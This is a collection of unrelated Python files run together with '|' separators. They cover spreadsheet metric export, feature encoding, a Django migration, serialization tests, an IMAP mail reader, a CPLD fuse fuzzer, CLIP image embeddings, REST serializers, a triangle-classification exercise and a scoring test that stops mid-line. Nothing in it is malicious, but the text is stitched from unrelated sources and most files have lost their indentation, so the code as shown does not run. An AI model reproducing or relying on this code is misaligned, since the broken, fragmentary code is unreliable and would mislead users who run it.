for iter_column_idx in range(24):
curr_sheet.set_column(
iter_column_idx + 2,
iter_column_idx + 2,
19,
options={"hidden": iter_column_idx not in well_indices},
)
curr_sheet.freeze_panes(2, 2)
def _write_submetrics(
self,
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
iter_metric_uuid: uuid.UUID,
iter_metric_name: Union[str, Tuple[int, str]],
) -> int:
submetrics = ("Mean", "StDev", "CoV", "SEM", "Min", "Max")
if isinstance(iter_metric_name, tuple):
iter_width_percent, iter_metric_name = iter_metric_name
curr_sheet.write(curr_row, 0, iter_metric_name)
for iter_sub_metric_name in submetrics:
msg = f"Writing {iter_sub_metric_name} of {iter_metric_name}"
logger.info(msg)
curr_sheet.write(curr_row, 1, iter_sub_metric_name)
well_indices = self.get_well_indices()
for well_index in well_indices:
value_to_write: Optional[Union[float, int, str]] = None
cell_format: Optional[Format] = None
iter_pipeline = self._pipelines[well_index]
try:
(_, aggregate_metrics_dict) = iter_pipeline.get_force_data_metrics()
except PeakDetectionError:
value_to_write = "N/A"
else:
metrics_dict = dict()
if iter_metric_uuid in (WIDTH_UUID, RELAXATION_TIME_UUID, CONTRACTION_TIME_UUID):
metrics_dict = aggregate_metrics_dict[iter_metric_uuid][iter_width_percent]
else:
metrics_dict = aggregate_metrics_dict[iter_metric_uuid]
if iter_sub_metric_name == "Mean":
value_to_write = metrics_dict["mean"]
elif iter_sub_metric_name == "StDev":
value_to_write = metrics_dict["std"]
elif iter_sub_metric_name == "Max":
value_to_write = metrics_dict["max"]
elif iter_sub_metric_name == "Min":
value_to_write = metrics_dict["min"]
elif iter_sub_metric_name == "CoV":
if metrics_dict["std"] is not None and metrics_dict["mean"] is not None:
value_to_write = metrics_dict["std"] / metrics_dict["mean"]
else:
value_to_write = None
cell_format = self._workbook_formats["CoV"]
elif iter_sub_metric_name == "SEM":
if metrics_dict["std"] is not None:
value_to_write = metrics_dict["std"] / metrics_dict["n"] ** 0.5
else:
value_to_write = None
else:
raise NotImplementedError(f"Unrecognized submetric name: {iter_sub_metric_name}")
if iter_metric_uuid == AMPLITUDE_UUID:
if not isinstance(value_to_write, float):
raise NotImplementedError(
f"The value under key {AMPLITUDE_UUID} must be a float."
)
if (
iter_sub_metric_name != "CoV"
): # coefficients of variation are %, not a raw time unit
value_to_write *= MICRO_TO_BASE_CONVERSION
if iter_metric_uuid in (
TWITCH_PERIOD_UUID,
WIDTH_UUID,
IRREGULARITY_INTERVAL_UUID,
RELAXATION_TIME_UUID,
CONTRACTION_TIME_UUID,
):
# for time-based metrics, convert from centi-milliseconds to seconds before writing to Excel
if (iter_sub_metric_name != "CoV") and value_to_write is not None:
# coefficients of variation are %, not a raw time unit
value_to_write /= CENTIMILLISECONDS_PER_SECOND
if iter_metric_uuid in (CONTRACTION_VELOCITY_UUID, RELAXATION_VELOCITY_UUID):
                        # for velocity-based metrics, convert the time base from centi-milliseconds to
                        # seconds and the force from micro to base units before writing to Excel
if iter_sub_metric_name != "CoV":
# coefficients of variation are %, not a raw time unit
value_to_write *= CENTIMILLISECONDS_PER_SECOND * MICRO_TO_BASE_CONVERSION
try:
curr_sheet.write(curr_row, 2 + well_index, value_to_write, cell_format)
except TypeError:
pass
curr_row += 1
return curr_row
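# Illustrative standalone sketch (not used by the class above, and the helper name is made up):
# the CoV and SEM cells written by _write_submetrics boil down to these two formulas applied
# to the aggregate metrics dict.
def _cov_and_sem(mean, std, n):
    """Return (coefficient of variation, standard error of the mean), or None where undefined."""
    cov = std / mean if (std is not None and mean) else None
    sem = std / n ** 0.5 if std is not None else None
    return cov, sem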
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 10:31:35 2015
@author: gferry
"""
import pandas as pd
import numpy as np
from sklearn.kernel_approximation import RBFSampler
from sklearn.preprocessing import scale
# input  => DataFrame + list of fields to one-hot encode + frequency threshold
# output => one-hot encoded DataFrame
# NB: NaN values get their own indicator column when frequent enough (see below)
def vectorize(DataFrame, cols, thres):
mat = pd.DataFrame(DataFrame)
nrows = len(mat)
newmat = pd.DataFrame(dtype=int)
for field in cols:
        # keep only the values whose relative frequency exceeds the threshold
        m = np.array((mat[field].value_counts() / nrows).reset_index())
        m = np.array(list(filter(lambda row: row[1] > thres, m)))
        for e in m:
            newmat[field + '|' + str(e[0])] = mat[field].apply(lambda value: 1 if value == e[0] else 0)
        if float(mat[field].isnull().sum()) / nrows > thres:
            newmat[field + '|NaN'] = mat[field].isnull().astype(int)
    print(newmat.sum())
return newmat
def kpca_vector(DataFrame,cols,gamma,n_comp=3,thres=0.001):
mat = pd.DataFrame(DataFrame)
mat = mat[cols]
vector = vectorize(mat,cols,thres)
mat = pd.concat([mat,vector],axis=1)
mat.drop(cols,axis=1,inplace=True)
    kern = scale(np.array(mat, dtype=float))
kpca = RBFSampler(n_components=n_comp, gamma=gamma)
kern = kpca.fit_transform(kern)
mat.drop(mat.columns,axis=1,inplace=True)
cols = ['kpca'+ str(i) for i in range(n_comp)]
for c in cols:
mat[c]=np.zeros(len(mat))
mat[cols]=kern
return mat
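# Minimal usage sketch for vectorize() (illustrative only; the column names, values and
# threshold below are made up, not taken from any real dataset):
if __name__ == '__main__':
    demo = pd.DataFrame({'color': ['red', 'red', 'blue', None], 'size': ['S', 'M', 'M', 'M']})
    print(vectorize(demo, ['color', 'size'], thres=0.1))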
|
# Generated by Django 2.2.12 on 2020-06-03 12:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("users", "0009_auto_20200505_0942"),
]
operations = [
migrations.AlterField(
model_name="userorganisationrelationship",
name="organisation",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="users", to="organisations.Organisation"
),
),
]
|
import unittest
import zserio
from testutils import getZserioApi
class UInt64EnumTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.api = getZserioApi(__file__, "enumeration_types.zs").uint64_enum
def testValues(self):
self.assertEqual(NONE_COLOR_VALUE, self.api.DarkColor.NONE_COLOR.value)
self.assertEqual(DARK_RED_VALUE, self.api.DarkColor.DARK_RED.value)
self.assertEqual(DARK_BLUE_VALUE, self.api.DarkColor.DARK_BLUE.value)
self.assertEqual(DARK_GREEN_VALUE, self.api.DarkColor.DARK_GREEN.value)
def testFromReader(self):
writer = zserio.BitStreamWriter()
writer.write_bits(self.api.DarkColor.DARK_GREEN.value, DARK_COLOR_BITSIZEOF)
reader = zserio.BitStreamReader(writer.byte_array, writer.bitposition)
color = self.api.DarkColor.from_reader(reader)
self.assertEqual(DARK_GREEN_VALUE, color.value)
def testBitSizeOf(self):
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.NONE_COLOR.bitsizeof())
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.DARK_RED.bitsizeof())
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.DARK_BLUE.bitsizeof())
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.DARK_GREEN.bitsizeof())
def testInitializeOffsets(self):
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.NONE_COLOR.initialize_offsets(0))
self.assertEqual(DARK_COLOR_BITSIZEOF + 1, self.api.DarkColor.DARK_RED.initialize_offsets(1))
self.assertEqual(DARK_COLOR_BITSIZEOF + 2, self.api.DarkColor.DARK_BLUE.initialize_offsets(2))
self.assertEqual(DARK_COLOR_BITSIZEOF + 3, self.api.DarkColor.DARK_GREEN.initialize_offsets(3))
def testWrite(self):
writer = zserio.BitStreamWriter()
self.api.DarkColor.DARK_RED.write(writer)
reader = zserio.BitStreamReader(writer.byte_array, writer.bitposition)
self.assertEqual(DARK_RED_VALUE, reader.read_bits(DARK_COLOR_BITSIZEOF))
DARK_COLOR_BITSIZEOF = 64
NONE_COLOR_VALUE = 0
DARK_RED_VALUE = 1
DARK_BLUE_VALUE = 2
DARK_GREEN_VALUE = 7
|
#!/usr/bin/env python
import sys
import imaplib
import email
import datetime
from barbara import app
USER_EMAIL = app.config['USER_EMAIL_FOR_PROMOTIONS']
USER_PASSWORD = app.config['USER_EMAIL_PASSWORD']
EMAIL_LABEL = 'INBOX'
SEARCH_TYPE_ALL = 'ALL'
SORT_RECENT_FIRST = 'REVERSE DATE' # Descending, most recent email first
ENCODING_UTF_8 = 'UTF-8'
MAIL_TIME_FRAME = 30  # days: only look at roughly the last month of email
def read_email(search_pattern):
MAIL_BOX = imaplib.IMAP4_SSL('imap.gmail.com')
search_response = None
try:
MAIL_BOX.login(USER_EMAIL, USER_PASSWORD)
except imaplib.IMAP4.error:
print("LOGIN FAILED!!! ")
return None
# ... exit or deal with failure...
rv, mailboxes = MAIL_BOX.list()
if rv == 'OK':
print("Mailboxes:")
print(mailboxes)
rv, data = MAIL_BOX.select(EMAIL_LABEL)
if rv == 'OK':
print("Processing mailbox...\n")
search_response = process_mailbox(MAIL_BOX, search_pattern) # ... do something with emails, see below ...
MAIL_BOX.close()
MAIL_BOX.logout()
return search_response
# Note: process_mailbox() only has to exist by the time read_email() is called,
# so defining it after read_email() is fine.
def process_mailbox(MAIL_BOX_INSTANCE, search_pattern):
# regex = r'(X-GM-RAW "subject:\"%s\"")' % search_pattern
search_response = []
print(search_pattern)
date = (datetime.date.today() - datetime.timedelta(MAIL_TIME_FRAME)).strftime("%d-%b-%Y")
rv, data = MAIL_BOX_INSTANCE.search(None, SEARCH_TYPE_ALL,
'(SENTSINCE {date} HEADER Subject "{subject_pattern}")'
.format(date=date, subject_pattern=search_pattern))
# M.sort(SORT_RECENT_FIRST, ENCODING_UTF_8, SEARCH_TYPE_ALL, regex) #
if rv != 'OK':
print("No messages found!")
return None
for num in data[0].split():
rv, data = MAIL_BOX_INSTANCE.fetch(num, '(RFC822)')
if rv != 'OK':
print("ERROR getting message", num)
return None
msg = email.message_from_string(data[0][1])
print('Message %s: %s' % (num, msg['Subject']))
print('Raw Date:', msg['Date'])
search_response.append(msg['Subject'])
date_tuple = email.utils.parsedate_tz(msg['Date'])
if date_tuple:
local_date = datetime.datetime.fromtimestamp(
email.utils.mktime_tz(date_tuple))
print("Local Date:", \
local_date.strftime("%a, %d %b %Y %H:%M:%S"))
return search_response
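# Example invocation (the subject pattern below is made up; credentials come from the
# Flask app config imported above):
if __name__ == '__main__':
    print(read_email('promotion'))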
|
# UIM muxes are fuzzed in three stages. This third stage is a depth fuzzer: it discovers all
# remaining UIM mux choices by recursively searching the routing state space with a highly
# randomized algorithm based on Knuth's "Algorithm X". (This is the only nondeterministic fuzzer
# in the project.)
import random
import subprocess
from util import database, toolchain, bitdiff, progress
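# For orientation, a stripped-down sketch of the "Algorithm X" exact-cover idea the header
# comment refers to (pure illustration; the real search below is randomized, bounded and
# domain-specific, and does not call this function):
def _exact_cover_sketch(universe, subsets, chosen=()):
    if not universe:
        return chosen
    element = next(iter(universe))
    for name, members in subsets.items():
        if element in members:
            remaining = {n: s for n, s in subsets.items() if not (s & members)}
            result = _exact_cover_sketch(universe - members, remaining, chosen + (name,))
            if result is not None:
                return result
    return None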
with database.transact() as db:
for device_name, device in db.items():
progress(device_name)
det_random = random.Random(0)
package, pinout = next(iter(device['pins'].items()))
blocks = device['blocks']
uim_mux_range = range(*device['ranges']['uim_muxes'])
uim_mux_size = len(uim_mux_range) // len(device['switches'])
def run(nets, probe_macrocell):
pads = [net[:-4] for net in nets if net.endswith("_PAD")]
fbs = [net[:-3] for net in nets if net.endswith("_FB")]
sigs = pads + fbs
ins = [f"input {pad}" for pad in pads]
bffs = [f"wire {fb}; DFF fb_{fb}(1'b0, 1'b0, {fb}); " for fb in fbs]
ands = []
# We need way too many inputs to rely on existing primitives.
ands.append(f"wire Y0; BUF b(1'b1, Y0); ")
y_wire = "Y0"
for n, off in enumerate(range(0, len(sigs), 3)):
chunk = sigs[off:off + 3]
last = (off + 3 >= len(sigs))
ands.append(f"wire Y{n+1}; AND{len(chunk) + 1} "
f"a_{n+1}(Y{n}, {', '.join(chunk)}, Y{n+1}); ")
y_wire = f"Y{n+1}"
return toolchain.run(
f"module top(output Q, {', '.join(ins)}); "
f"{' '.join(bffs)} "
f"{' '.join(ands)} "
f"DFF ff(1'b0, {y_wire}, Q); "
f"endmodule",
{
'Q': pinout[probe_macrocell['pad']],
**{
pad: pinout[pad]
for pad in pads
},
**{
f"fb_{fb}": str(600 + int(fb[2:]))
for fb in fbs
},
},
f"{device_name}-{package}")
switches = device['switches']
uim_fuses_total = len(uim_mux_range)
uim_fuses_known = None
# Obtained through celestial rituals.
if device_name.startswith("ATF1502"):
gnd_per_block = 32
elif device_name.startswith("ATF1504"):
gnd_per_block = 28
elif device_name.startswith("ATF1508"):
gnd_per_block = 36
else:
assert False
extra = 0
visited = set()
while (uim_fuses_known is None or
uim_fuses_known + len(device['blocks']) * gnd_per_block < uim_fuses_total):
uim_fuses_known = sum(len(switch['mux']['values']) - 1
for switch in device['switches'].values())
progress(2)
progress((uim_fuses_known, uim_fuses_total))
all_blocks_failed = True
for block_name, block in device['blocks'].items():
block_uim_muxes = {uim_name: switches[uim_name]['mux']
for uim_name in block['switches']}
block_uim_nets = set(sum((list(net_name
for net_name in switches[uim_name]['mux']['values']
if not net_name.startswith('GND'))
for uim_name in block['switches']), []))
dead_branches = 0
dull_reduces = 0
def extract_fuses(net_set):
assert len(net_set) < 40
for probe_macrocell_name, probe_macrocell in device['macrocells'].items():
if probe_macrocell['block'] != block_name: continue
if f"{probe_macrocell_name}_FB" in net_set: continue
if f"{probe_macrocell['pad']}_PAD" in net_set: continue
break
else:
assert False
return run(sorted(net_set), probe_macrocell)
def find_muxes(net_set, fuses):
nets = set(net_set)
found = 0
found_uim_name = found_uim_value = None
for new_uim_name, new_uim_mux in block_uim_muxes.items():
new_uim_value = sum(fuses[fuse] << n_fuse
for n_fuse, fuse in enumerate(new_uim_mux['fuses']))
if new_uim_value == new_uim_mux['values']['GND1']: continue
for new_uim_net, new_uim_net_value in new_uim_mux['values'].items():
if new_uim_net_value == new_uim_value:
nets.remove(new_uim_net)
break
else:
found += 1
found_uim_name = new_uim_name
found_uim_value = new_uim_value
if found == 1:
assert len(nets) == 1, f"expected a single net, not {nets}"
found_uim_net = nets.pop()
found_uim_mux = device['switches'][found_uim_name]['mux']
assert found_uim_net not in found_uim_mux['values']
assert found_uim_value not in found_uim_mux['values'].values()
found_uim_mux['values'][found_uim_net] = found_uim_value
return found
def reduce_leaf(net_set):
global dull_reduces
try:
fuses = extract_fuses(net_set)
except toolchain.FitterError:
return False
except subprocess.CalledProcessError as err:
if err.returncode == 245:
return False
raise
found = find_muxes(net_set, fuses)
if found == 0:
return False
elif found == 1:
return True
else: # found > 1
progress(1)
for net_name in det_random.sample(sorted(net_set), len(net_set)):
if dull_reduces > 10:
break
if reduce_leaf(net_set.difference({net_name})):
found = find_muxes(net_set, fuses)
if found <= 1:
break
else:
dull_reduces += 1
return True
def search_tree(uims, nets, net_set=frozenset(), extra=0):
global dead_branches, live_leaves, dull_reduces
if dead_branches > 20:
return False
if len(uims) == 0 or len(nets) == 0:
net_set = net_set.union(
det_random.sample(sorted(block_uim_nets - net_set), extra))
while len(net_set) > 35:
                        net_set = net_set.difference({det_random.choice(sorted(net_set))})
if net_set in visited:
return False
else:
visited.add(net_set)
dull_reduces = 0
if reduce_leaf(net_set):
dead_branches = 0
return True
else:
dead_branches += 1
return False
uim_name = det_random.choice(sorted(uims))
net_names = [name for name in switches[uim_name]['mux']['values']
if name in nets]
for net_name in det_random.sample(net_names, len(net_names)):
removed_uims = set(uim_name for uim_name in block_uim_muxes
if net_name in switches[uim_name]['mux']['values'])
removed_nets = set(sum((list(switches[uim_name]['mux']['values'])
for uim_name in removed_uims), []))
if search_tree(uims=uims - removed_uims,
nets=nets - removed_nets,
net_set=net_set.union({net_name}),
extra=extra):
return True
return False
uims = set(block_uim_muxes)
nets = set(sum((list(name for name in switches[uim_name]['mux']['values']
if not name.startswith('GND'))
for uim_name in block_uim_muxes), []))
if search_tree(uims, nets, extra=extra):
all_blocks_failed = False
if all_blocks_failed:
progress(3)
extra += 1
for switch_name, switch in device['switches'].items():
mux = switch['mux']
if 'GND0' in mux['values']: continue
# Some UIM muxes have one fuse which is never used by the fitter. Hardware testing
# and celestial rituals demonstrate that this fuse drives the PT input network low.
assert (len(mux['values']) - 1) in (len(mux['fuses']) - 1, len(mux['fuses'])), \
f"UIM mux {switch_name} should have zero or one unused values"
# Setting the mux to all-ones (erased state) has the exact same result, so call the GND
# with all-ones "GND1" and the GND with one fuse set to 0 "GND0".
erased_value = (1 << len(mux['fuses'])) - 1
mux['values']['GND1'] = erased_value
for n_fuse in range(len(mux['fuses'])):
value = erased_value ^ (1 << n_fuse)
if value not in mux['values'].values():
mux['values']['GND0'] = value
# Make chipdb deterministic.
mux['values'] = {
key: value
for key, value in sorted(mux['values'].items(),
key=lambda kv: erased_value ^ kv[1])
}
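# Worked example of the GND encoding above (the fuse count is illustrative, not taken from
# a real device): a mux with 5 fuses has erased value 0b11111 == 31 ("GND1"), and clearing
# exactly one fuse yields one of the "GND0" candidates below.
_example_fuse_count = 5
_example_erased = (1 << _example_fuse_count) - 1
_example_gnd0_candidates = [_example_erased ^ (1 << n) for n in range(_example_fuse_count)]
assert _example_erased == 31 and _example_gnd0_candidates == [30, 29, 27, 23, 15]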
|
# -*- coding: utf-8 -*-
from datetime import datetime, date, timedelta
from odoo import models, fields, api, _
from odoo.exceptions import Warning
class DocumentType(models.Model):
_name = 'document.type'
name = fields.Char(string="Name", required=True, help="Name")
|
import pytest
from qforce_examples import Gaussian_default
from qforce.main import run_qforce
@pytest.mark.parametrize("batch_run,exist", [(True, False), (False, True)])
def test_BatchRun(batch_run, exist, tmpdir):
setting = tmpdir.join('settings')
setting.write('''[scan]
batch_run = {}
frag_lib = {}/qforce_fragments
'''.format(batch_run, tmpdir))
tmpdir.mkdir('propane_qforce')
tmpdir.join('propane_qforce').join('propane_hessian.log').mksymlinkto(
Gaussian_default['out_file'])
tmpdir.join('propane_qforce').join('propane_hessian.fchk').mksymlinkto(
Gaussian_default['fchk_file'])
tmpdir.join('propane.xyz').mksymlinkto(
Gaussian_default['xyz_file'])
# First run
try:
run_qforce(input_arg=tmpdir.join('propane.xyz').strpath,
config=tmpdir.join('settings').strpath)
except SystemExit:
pass
# Fragment file generated
assert tmpdir.join('propane_qforce').join('fragments').join(
'CC_H8C3_d91b46644317dee9c2b868166c66a18c~1.inp').isfile()
tmpdir.join('propane_qforce').join('fragments').remove()
# Second run
try:
run_qforce(input_arg=tmpdir.join('propane.xyz').strpath,
config=tmpdir.join('settings').strpath)
except SystemExit:
pass
# Fragment file generated again if batch_run is False
# Fragment file not generated again if batch_run is True
assert tmpdir.join('propane_qforce').join('fragments').join(
'CC_H8C3_d91b46644317dee9c2b868166c66a18c~1.inp').isfile() is exist
|
import json
import os
import pickle
import random
import shutil
import sys
from pathlib import Path
import pytesseract
import yaml
from tqdm import tqdm
import cv2
from glob import glob
from PIL import Image
import torch
import numpy as np
from decord import VideoReader, cpu
from brisque import BRISQUE
import traceback
import clip
device = "cuda" if torch.cuda.is_available() else "cpu"
print('USING DEVICE: ' + device)
model, preprocess = clip.load("ViT-B/32", device=device, jit=False) # Must set jit=False for training
def encode_images(photos_batch):
photos = [Image.open(photo_file) for photo_file in photos_batch]
photos_preprocessed = torch.stack([preprocess(photo) for photo in photos]).to(device)
with torch.no_grad():
photos_features = model.encode_image(photos_preprocessed)
photos_features /= photos_features.norm(dim=-1, keepdim=True)
return photos_features.cpu().numpy()
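# Because the features above are unit-normalized, the Euclidean distances used below are a
# monotone transform of cosine similarity: ||a - b||^2 == 2 - 2 * (a . b). Tiny standalone
# check (illustrative only, not part of the pipeline):
_a, _b = np.array([1.0, 0.0]), np.array([0.6, 0.8])
assert abs(np.linalg.norm(_a - _b) ** 2 - (2 - 2 * float(_a @ _b))) < 1e-9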
# train = json.load(open('train_data.json', 'r'))
# valid = json.load(open('valid_data.json', 'r'))
# test = json.load(open('test_data.json', 'r'))
#
# dataset = train | valid | test
dataset = yaml.load(open('ann_valid_data_rich.yaml', 'r'), Loader=yaml.SafeLoader)
total_images = 0
diffs_images = 0
total_vids = 0
diffs_vids = 0
for img_set, val in tqdm(list(dataset.items())):
img_files = list(((Path('games')/ img_set).glob("*.jpg")))
img_files = sorted(img_files, key=lambda x: int(str(x).split('/')[-1].split('.')[0][3:]))
img_embs = encode_images(img_files)
for idx, details in val.items():
example_diff = 0
for j in range(10):
if j != int(idx):
dist = float(np.linalg.norm(img_embs[int(idx)] - img_embs[j]))
example_diff += dist
if 'open-images' in img_set:
diffs_images += dist
total_images += 1
else:
diffs_vids += dist
total_vids += 1
details['sum_image_differences'] = str(round(example_diff,4))
dataset[img_set][idx] = details
yaml.dump(dataset, open('ann_valid_data_rich.yaml', 'w'), default_style='"', sort_keys=False)
print(f'Average video embedding distance: {round(diffs_vids/total_vids, 4)}')
print(f'Average image embedding distance: {round(diffs_images/total_images, 4)}')
|
#!/usr/bin/env python3
# encoding=utf-8
from setuptools import setup, find_packages
if __name__ == '__main__':
setup(
#package_dir={'animalia': 'animalia'},
# this works if species.txt is at ./animalia/species.txt
#package_data={'animalia': ['species.txt']},
# blah
#packages=['find:', 'animalia'],
#packages=find_packages('src'),
#package_dir={'': 'src'},
include_package_data=True,
#package_data={'': ['data/species.txt']},
#this gets installed in /usr/share/animalia/species.txt
# animalia-0.0.12.data/data/share/animalia/species.txt
# data_files=[('share/animalia', ['data/species.txt'])],
)
|
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from rest_framework.exceptions import APIException
from rest_framework.status import HTTP_400_BAD_REQUEST
from accounts.serializers import UserBasicPublicSerializer
from categories.models import SubCategory
from posts.models import Post
from threads.models import Thread, ThreadPost
from states.models import PendingState
from categories.serializers import SubCategory_PlusParent_Serializer
from posts.serializers import PostSerializer
class Thread_BasicInfo_Serializer(serializers.ModelSerializer):
user = UserBasicPublicSerializer(source='post.user', read_only=True)
url = serializers.CharField(source='get_absolute_url', read_only=True)
sub_category = SubCategory_PlusParent_Serializer(source="category", read_only=True)
sub_category_id = serializers.IntegerField(write_only=True)
class Meta:
model = Thread
fields = (
'user', 'url', 'title', 'description', 'sub_category', 'sub_category_id',
'is_private', 'created', 'visits_count', 'comments_count',
)
extra_kwargs = {
'is_private': {'read_only': True},
'created': {'read_only': True},
'visits_count': {'read_only': True},
'comments_count': {'read_only': True},
}
class Thread_ReadPendingState_Serializer(Thread_BasicInfo_Serializer):
pending_state = serializers.CharField(source='pending_state.state')
class Meta(Thread_BasicInfo_Serializer.Meta):
model = Thread
fields = Thread_BasicInfo_Serializer.Meta.fields + ('pending_state',)
read_only_fields = Thread_BasicInfo_Serializer.Meta.fields
class Thread_WritePendingState_Serializer(serializers.ModelSerializer):
pending_state = serializers.CharField(source='pending_state.state')
class Meta:
model = Thread
fields = ('pending_state',)
def validate_pending_state(self, value):
if value not in PendingState.states:
raise APIException(detail=f'only allowed {", ".join(PendingState.states)}', code=HTTP_400_BAD_REQUEST)
return value
def update(self, instance, validated_data):
new_state_value = validated_data.get('pending_state', instance.pending_state.state)
new_state, _ = PendingState.objects.get_or_create(state=new_state_value)
instance.pending_state = new_state
instance.save()
return instance
class ThreadComment_Serializer(serializers.ModelSerializer):
post = PostSerializer(read_only=True)
class Meta:
model = ThreadPost
fields = ('post', )
class Thread_FullInfo_Serializer(Thread_BasicInfo_Serializer):
post = PostSerializer()
comments = ThreadComment_Serializer(source='posts', many=True, read_only=True)
class Meta(Thread_BasicInfo_Serializer.Meta):
fields = Thread_BasicInfo_Serializer.Meta.fields + ('post', 'comments')
def create(self, validated_data):
request = self.context.get('request')
post_data = validated_data.get('post')
post = Post.objects.create_deep({'user': request.user, **post_data})
category_id = validated_data.pop('sub_category_id')
category = get_object_or_404(SubCategory, pk=category_id)
validated_data.update({'post': post, 'category': category})
return Thread.objects.create(**validated_data)
def update(self, instance, validated_data):
instance.title = validated_data.get('title', instance.title)
category_id = validated_data.get('sub_category_id', instance.category.pk)
instance.category = get_object_or_404(SubCategory, pk=category_id)
post_data = validated_data.get('post')
Post.objects.update_deep(instance.post, post_data)
instance.category.save()
instance.save()
return instance
class Thread_Owner_Serializer(Thread_FullInfo_Serializer):
pending_state = serializers.CharField(source='pending_state.state', read_only=True)
privacy_state = serializers.CharField(source='privacy_state.state', read_only=True)
class Meta(Thread_FullInfo_Serializer.Meta):
fields = Thread_FullInfo_Serializer.Meta.fields + ('pending_state', 'privacy_state')
|
# Python Course 12
# ---Challenge 42---
# Redo Challenge 035 (triangles), adding the ability to
# report which type of triangle will be formed
from math import fabs
seg1 = float(input('Digite o comprimento do Segmento AB: '))
seg2 = float(input('Digite o comprimento do Segmento BC: '))
seg3 = float(input('Digite o comprimento do Segmento CA: '))
condicao1 = (fabs(seg2 - seg3) < seg1 < (seg2 + seg3))
condicao2 = (fabs(seg1 - seg3) < seg2 < (seg1 + seg3))
condicao3 = (fabs(seg1 - seg2) < seg3 < (seg1 + seg2))
if condicao1 and condicao2 and condicao3:
print('Os segmentos acima podem formar um ', end='')
if seg1 == seg2 and seg1 == seg3:
print('Triangulo Equilátero')
elif seg1 == seg2 or seg2 == seg3 or seg3 == seg1:
print('Triangulo Isósceles')
elif seg1 != seg2 and seg2 != seg3:
print('Triangulo Escaleno')
else:
print('Os segmentos acima NÃO podem formar um triângulo')
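# Worked check (illustrative, separate from the interactive flow above): sides 3, 4 and 5
# satisfy all three inequalities and are pairwise distinct, so they form a scalene triangle.
assert fabs(4 - 5) < 3 < (4 + 5) and fabs(3 - 5) < 4 < (3 + 5) and fabs(3 - 4) < 5 < (3 + 4)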
|
import os
import sys
import re
import tempfile
import json
import args_and_configs
import scoring_metrics
import text_extraction
from pytest import approx
from pandas.testing import assert_frame_equal
#############################################
## Test helper functions
#############################################
def initialize_perfect_track1_score_card():
score_card = scoring_metrics.new_score_card()
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'TP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
